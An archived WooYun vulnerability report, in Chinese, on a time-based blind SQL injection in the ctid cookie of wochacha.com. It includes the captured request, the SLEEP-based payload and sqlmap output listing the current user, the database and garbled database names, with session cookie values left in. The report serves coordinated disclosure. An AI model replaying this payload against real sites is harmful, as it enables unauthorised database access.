乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-21: 厂商已经确认,细节仅向厂商公开 2015-08-31: 细节向核心白帽子及相关领域专家公开 2015-09-10: 细节向普通白帽子公开 2015-09-20: 细节向实习白帽子公开 2015-10-05: 细节向公众公开
测试完后,发现已经被提交过了,但是有些修复了,还有一个没有修复
1、抓包
GET http://www.wochacha.com/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://www.wochacha.com/interface_getbasecity.htmlAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400Accept-Encoding: gzip, deflateHost: www.wochacha.comConnection: Keep-AliveCookie: wccid=ae0a273167dc2bfe1f57fc208ca28e7b; ctid=2; ctname=%E5%8C%97%E4%BA%AC%E5%B8%82; Hm_lvt_f03a6dc050c95205501bd6f3ef63834c=1439689089; Hm_lpvt_f03a6dc050c95205501bd6f3ef63834c=1439689145; top_banner=2015%2F8%2F16
ctid存在注入,wccid、ctname已经被修复了,2、sqlmap测试
sqlmap identified the following injection points with a total of 1205 HTTP(s) requests:---Place: CookieParameter: ctid Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: wccid=362ac98c111996f2257a9c8eacb0c4f0; ctid=2%' AND SLEEP(5) AND '%'='; ctname=%E5%8C%97%E4%BA%AC%E5%B8%82; Hm_lvt_f03a6dc050c95205501bd6f3ef63834c=1439689089; Hm_lpvt_f03a6dc050c95205501bd6f3ef63834c=1439689145; top_banner=2015/8/16---[10:15:40] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.11[10:21:34] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.11[10:21:34] [INFO] fetching current user[10:21:34] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[10:21:34] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[10:21:43] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[10:22:09] [INFO] heuristics detected web page charset 'ascii'[10:22:09] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloadsacurrent user: 'a'[10:33:17] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.11[10:33:17] [INFO] fetching current database[10:33:17] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[10:33:17] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[10:33:28] [INFO] heuristics detected web page charset 'ascii'do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[10:33:30] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[10:33:42] [INFO] adjusting time delay to 2 seconds due to good response times[10:33:47] [ERROR] invalid character detected. retrying..[10:33:47] [WARNING] increasing time delay to 3 secondss[10:34:22] [ERROR] invalid character detected. retrying..[10:34:22] [WARNING] increasing time delay to 4 secondse[10:34:59] [ERROR] invalid character detected. retrying..[10:34:59] [WARNING] increasing time delay to 5 secondscu[10:36:09] [ERROR] invalid character detected. retrying..[10:36:09] [WARNING] increasing time delay to 6 secondsrity[10:38:14] [ERROR] invalid character detected. retrying..[10:38:14] [WARNING] increasing time delay to 7 secondscurrent database: 'security'[10:40:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.11[10:40:33] [INFO] fetching database names[10:40:33] [INFO] fetching number of databases[10:40:33] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[10:40:33] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[10:40:40] [INFO] heuristics detected web page charset 'ascii'[10:40:40] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloadsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y1[10:40:59] [INFO] adjusting time delay to 2 seconds due to good response times0[10:41:01] [INFO] retrieved: inf[10:42:08] [ERROR] invalid character detected. retrying..[10:42:08] [WARNING] increasing time delay to 3 seconds[10:42:25] [ERROR] invalid character detected. retrying..[10:42:25] [WARNING] increasing time delay to 4 secondso[10:43:23] [ERROR] invalid character detected. retrying..[10:43:23] [WARNING] increasing time delay to 5 secondsrmati[10:45:47] [ERROR] invalid character detected. retrying..[10:45:47] [WARNING] increasing time delay to 6 secondso[10:46:48] [ERROR] invalid character detected. retrying..[10:46:48] [WARNING] increasing time delay to 7 seconds[10:47:16] [ERROR] unable to properly validate last character value ('q')..q_[10:47:53] [ERROR] invalid character detected. retrying..[10:47:53] [WARNING] increasing time delay to 3 secondssch[10:48:55] [ERROR] invalid character detected. retrying..[10:48:55] [WARNING] increasing time delay to 4 secondsema[10:49:46] [INFO] retrieved: gcore[10:51:28] [INFO] retrieved: gc[10:53:00] [ERROR] invalid character detected. retrying..[10:53:00] [WARNING] increasing time delay to 5 secondsoreinc[10:55:26] [INFO] retrieved: mysq[10:57:29] [ERROR] invalid character detected. retrying..[10:57:29] [WARNING] increasing time delay to 6 secondsl[10:58:08] [INFO] retrieved:[10:58:40] [ERROR] invalid character detected. retrying..[10:58:40] [WARNING] increasing time delay to 7 seconds[10:59:15] [ERROR] unable to properly validate last character value ('y')..yecurity[11:00:40] [ERROR] invalid character detected. retrying..[11:00:40] [WARNING] increasing time delay to 3 seconds[11:00:43] [INFO] retrieved: te[11:01:44] [ERROR] invalid character detected. retrying..[11:01:44] [WARNING] increasing time delay to 4 secondss[11:02:27] [ERROR] invalid character detected. retrying..[11:02:27] [WARNING] increasing time delay to 5 secondst[11:03:15] [ERROR] invalid character detected. retrying..[11:03:15] [WARNING] increasing time delay to 6 seconds[11:03:26] [ERROR] invalid character detected. retrying..[11:03:26] [WARNING] increasing time delay to 7 seconds[11:03:29] [INFO] retrieved: thi[11:05:49] [ERROR] unable to properly validate last character value ('y')..ydapp[11:06:51] [INFO] retrieved: t[11:07:18] [ERROR] invalid character detected. retrying..[11:07:18] [WARNING] increasing time delay to 3 secondsrap[11:08:17] [ERROR] invalid character detected. retrying..[11:08:17] [WARNING] increasing time delay to 4 seconds[11:08:33] [ERROR] invalid character detected. retrying..[11:08:33] [WARNING] increasing time delay to 5 seconds[11:08:36] [INFO] retrieved: wc[11:09:51] [ERROR] invalid character detected. retrying..[11:09:51] [WARNING] increasing time delay to 6 secondsc[11:10:23] [ERROR] invalid character detected. retrying..[11:10:23] [WARNING] increasing time delay to 7 seconds[11:10:26] [INFO] retrieved:[11:11:13] [ERROR] unable to properly validate last character value ('|')..|ab[11:11:46] [ERROR] invalid character detected. retrying..[11:11:46] [WARNING] increasing time delay to 3 secondsbixavailable databases [10]:[*] `|abbix`[*] gcore[*] gcoreinc[*] informatioq_schema[*] mysql[*] test[*] thiydapp[*] trap[*] wcc[*] yecurity
网络不是很好,所以有些延时错误,就不继续了!~~~
危害等级:中
漏洞Rank:8
确认时间:2015-08-21 14:55
正在进行修复
暂无